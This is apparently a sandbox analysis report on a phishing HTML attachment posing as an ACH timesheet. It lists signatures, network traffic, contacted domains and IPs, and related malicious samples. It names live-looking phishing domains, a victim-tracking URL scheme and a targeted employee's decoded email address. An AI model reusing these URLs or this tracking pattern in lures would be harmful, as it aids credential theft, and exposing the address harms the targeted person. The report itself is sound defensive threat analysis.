Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Timesheet ACH-Tbconsulting.November 16, 2024.html

Overview

General Information

Sample name:Timesheet ACH-Tbconsulting.November 16, 2024.html
Analysis ID:1578424
MD5:fdc286ce98189404a993230167e65fbb
SHA1:1bca6d04f245b9416afc3ec1848ed5ff7b9f5d84
SHA256:be9ffc5395a651eee7b4a08fd63ba750402845ac20a9b75deacc8a298358608e
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious Javascript
Detected javascript redirector / loader
HTML Script injector detected
HTML page contains hidden javascript code
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 5784 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Timesheet ACH-Tbconsulting.November 16, 2024.html" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 5912 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 --field-trial-handle=2320,i,6646080088605768551,9883575881723638348,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

barindex
AI detected suspicious Javascript
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://proposal-5ye.pages.dev/#?service=Yld0dWRXU... The script demonstrates several high-risk behaviors, including data exfiltration, dynamic code execution, and interaction with suspicious domains. While some of the functionality may be legitimate, the overall implementation raises significant security concerns.
Detected javascript redirector / loader
Source: Timesheet ACH-Tbconsulting.November 16, 2024.htmlHTTP Parser: Low number of body elements: 0
HTML Script injector detected
Source: file:///C:/Users/user/Desktop/Timesheet%20ACH-Tbconsulting.November%2016,%202024.htmlHTTP Parser: New script tag found
Source: Timesheet ACH-Tbconsulting.November 16, 2024.htmlHTTP Parser: Base64 decoded: mknudsen@tbconsulting.com
Source: https://proposal-5ye.pages.dev/#?service=Yld0dWRXUnpaVzVBZEdKamIyNXpkV3gwYVc1bkxtTnZiUT09JnN0cnlrZXJyJmE=HTTP Parser: No favicon
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 151.101.2.137 151.101.2.137
Source: Joe Sandbox ViewIP Address: 151.101.2.137 151.101.2.137
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 40.81.94.65
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: tiny-hat-eab8.pagenew.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: tiny-hat-eab8.pagenew.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: proposal-5ye.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.7.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://proposal-5ye.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://proposal-5ye.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: proposal-5ye.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://proposal-5ye.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.7.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: proposal-5ye.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /public/api/validate_key/strykerr HTTP/1.1Host: natrium100gram.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://proposal-5ye.pages.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://proposal-5ye.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: tiny-hat-eab8.pagenew.workers.dev
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: proposal-5ye.pages.dev
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: natrium100gram.site
Source: chromecache_86.4.dr, chromecache_84.4.dr, chromecache_89.4.drString found in binary or memory: https://arab-oil.online
Source: chromecache_86.4.dr, chromecache_84.4.dr, chromecache_89.4.drString found in binary or memory: https://code.jquery.com/jquery-3.7.1.min.js
Source: chromecache_86.4.dr, chromecache_84.4.dr, chromecache_89.4.drString found in binary or memory: https://natrium100gram.site/public/api/validate_key/$
Source: chromecache_82.4.dr, chromecache_88.4.drString found in binary or memory: https://proposal-5ye.pages.dev/#?service=
Source: chromecache_90.4.dr, chromecache_85.4.drString found in binary or memory: https://tiny-hat-eab8.pagenew.workers.dev
Source: Timesheet ACH-Tbconsulting.November 16, 2024.htmlString found in binary or memory: https://www.zoom.com/en/about/
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: classification engineClassification label: mal52.phis.winHTML@27/14@20/8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Timesheet ACH-Tbconsulting.November 16, 2024.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 --field-trial-handle=2320,i,6646080088605768551,9883575881723638348,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 --field-trial-handle=2320,i,6646080088605768551,9883575881723638348,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions		1
Process Injection		1
Process Injection		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
tiny-hat-eab8.pagenew.workers.dev
104.21.51.134
truefalse
    		high
    code.jquery.com
    		151.101.130.137
    		truefalse
      		high
      proposal-5ye.pages.dev
      		172.66.47.118
      		truetrue
        		unknown
        www.google.com
        		172.217.19.164
        		truefalse
          		high
          natrium100gram.site
          		194.163.42.36
          		truefalse
            		unknown
            cdn.jsdelivr.net
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              file:///C:/Users/user/Desktop/Timesheet%20ACH-Tbconsulting.November%2016,%202024.htmltrue
                		unknown
                https://tiny-hat-eab8.pagenew.workers.dev/false
                  		unknown
                  https://proposal-5ye.pages.dev/favicon.icofalse
                    		unknown
                    https://natrium100gram.site/public/api/validate_key/strykerrfalse
                      		unknown
                      https://proposal-5ye.pages.dev/true
                        		unknown
                        https://code.jquery.com/jquery-3.7.1.min.jsfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://natrium100gram.site/public/api/validate_key/$chromecache_86.4.dr, chromecache_84.4.dr, chromecache_89.4.drfalse
                            		unknown
                            https://www.zoom.com/en/about/Timesheet ACH-Tbconsulting.November 16, 2024.htmlfalse
                              		high
                              https://arab-oil.onlinechromecache_86.4.dr, chromecache_84.4.dr, chromecache_89.4.drfalse
                                		unknown
                                https://proposal-5ye.pages.dev/#?service=chromecache_82.4.dr, chromecache_88.4.drtrue
                                  		unknown
                                  https://tiny-hat-eab8.pagenew.workers.devchromecache_90.4.dr, chromecache_85.4.drfalse
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    194.163.42.36
                                    		natrium100gram.siteGermany
                                    		6659NEXINTO-DEfalse
                                    172.217.19.164
                                    		www.google.comUnited States
                                    		15169GOOGLEUSfalse
                                    104.21.51.134
                                    		tiny-hat-eab8.pagenew.workers.devUnited States
                                    		13335CLOUDFLARENETUSfalse
                                    151.101.130.137
                                    		code.jquery.comUnited States
                                    		54113FASTLYUSfalse
                                    151.101.2.137
                                    		unknownUnited States
                                    		54113FASTLYUSfalse
                                    239.255.255.250
                                    		unknownReserved
                                    		unknownunknownfalse
                                    172.66.47.118
                                    		proposal-5ye.pages.devUnited States
                                    		13335CLOUDFLARENETUStrue

                                    Private

                                    IP
                                    192.168.2.7

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1578424
                                    Start date and time:2024-12-19 17:16:01 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 13s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:defaultwindowshtmlcookbook.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:15
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Timesheet ACH-Tbconsulting.November 16, 2024.html
                                    Detection:MAL
                                    Classification:mal52.phis.winHTML@27/14@20/8
                                    Cookbook Comments:
                                    • Found application associated with file extension: .html

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 142.250.181.99, 172.217.19.206, 64.233.164.84, 104.18.187.31, 104.18.186.31, 172.217.17.46, 142.250.181.138, 216.58.208.234, 172.217.19.202, 172.217.17.42, 142.250.181.106, 172.217.19.234, 172.217.17.74, 172.217.19.170, 142.250.181.42, 142.250.181.74, 23.193.114.26, 217.20.58.99, 172.217.17.35, 142.250.181.142, 13.107.246.63, 23.218.208.109, 20.12.23.50
                                    • Excluded domains from analysis (whitelisted): clients1.google.com, cdn.jsdelivr.net.cdn.cloudflare.net, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, time.windows.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, optimizationguide-pa.googleapis.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: Timesheet ACH-Tbconsulting.November 16, 2024.html

                                    Simulations

                                    Behavior and APIs

                                    No simulations

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    151.101.2.137http://novo.oratoriomariano.com/novo/Get hashmaliciousUnknownBrowse
                                    • code.jquery.com/jquery-3.3.1.min.js
                                    http://facebooksecurity.blogspot.dk/Get hashmaliciousUnknownBrowse
                                    • code.jquery.com/jquery-1.7.min.js
                                    http://soporte-store.info/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                    • code.jquery.com/jquery-1.11.3.min.js
                                    http://applela.za.com/isignesp.php?id=Get hashmaliciousUnknownBrowse
                                    • code.jquery.com/jquery-1.11.3.min.js
                                    http://www.oodlesoftraffic.com/ec/JaneMarksHealth/1934/acmariix2/Get hashmaliciousUnknownBrowse
                                    • code.jquery.com/jquery-1.9.1.js
                                    http://awqffg.newburuan2023.biz.id/next.phpGet hashmaliciousHTMLPhisherBrowse
                                    • code.jquery.com/jquery-1.10.2.min.js
                                    194.163.42.36ACH-information-Ag.pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                      239.255.255.2501So9BcQi1J.exeGet hashmaliciousStealc, VidarBrowse
                                        https://whtt.termlicari.ru/HnkNbg/Get hashmaliciousUnknownBrowse
                                          https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                            https://gmail.net-login.com/Xb1Rnb3pKRC9CUEdpbldIVTREbHhIK1Vza1NvaWlrblBIbkN4aUdCZUt0Y2NlSGJiWmZ2d0M1dTB5dEpRbnRoVDdBVkFTcEJqWGowNVZycWJNWHlIUHlLOG1qS0FvemVPSXpFRFhGcUhmaVU1ekQwMklrVmM0QjVpNmhLaDdoY1I4UlhMcFo1TTJaSFhtaWpiWWFqWGZ5WEg4TnBiOUl4MDI1RFMyWStQRFoyNFo5UFZNUUpmWXBtaUg0Y0FjUG1jejdSVnFVOXJQL2VzdmNLM1lEaWtmRkZnZEk2Vi0tVHFIeU0vOWxTN01YVEtXbS0tTTh5Skh1eEtsc0xTT0J5Rzg2Q2ZJQT09?cid=2330416057%3EOpenGet hashmaliciousKnowBe4Browse
                                              https://pdf.ac/3eQ2mdGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                  Gioia Faggioli-End Of Year-Bonus.docxGet hashmaliciousUnknownBrowse
                                                    https://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdfGet hashmaliciousPDFPhishBrowse
                                                      Eallentoff_401k_1484013830.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                          104.21.51.134ACH-information-Ag.pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            151.101.130.137http://mi-outlook-loggin.click/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                            • code.jquery.com/jquery-1.11.3.min.js
                                                            http://imaps-support.us/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                            • code.jquery.com/jquery-1.11.3.min.js
                                                            http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                            • code.jquery.com/jquery-1.7.min.js
                                                            https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AING.shalominternationalministry.com/index.xml%23?email=amFtZXMubGVhZGJlYXRlckBsb2dpY2FsaXMuY29tGet hashmaliciousUnknownBrowse
                                                            • code.jquery.com/jquery-3.3.1.min.js
                                                            http://site9613885.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                            • code.jquery.com/jquery-1.7.2.min.js

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            code.jquery.comhttps://whtt.termlicari.ru/HnkNbg/Get hashmaliciousUnknownBrowse
                                                            • 151.101.2.137
                                                            https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                            • 151.101.130.137
                                                            https://pdf.ac/3eQ2mdGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                            • 151.101.130.137
                                                            Gioia Faggioli-End Of Year-Bonus.docxGet hashmaliciousUnknownBrowse
                                                            • 151.101.2.137
                                                            Eallentoff_401k_1484013830.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 151.101.194.137
                                                            Non-Disclosure Agreement.htmlGet hashmaliciousUnknownBrowse
                                                            • 151.101.66.137
                                                            https://nicholaspackaging.businesslawcloud.com/mTlFMGet hashmaliciousHTMLPhisherBrowse
                                                            • 151.101.2.137
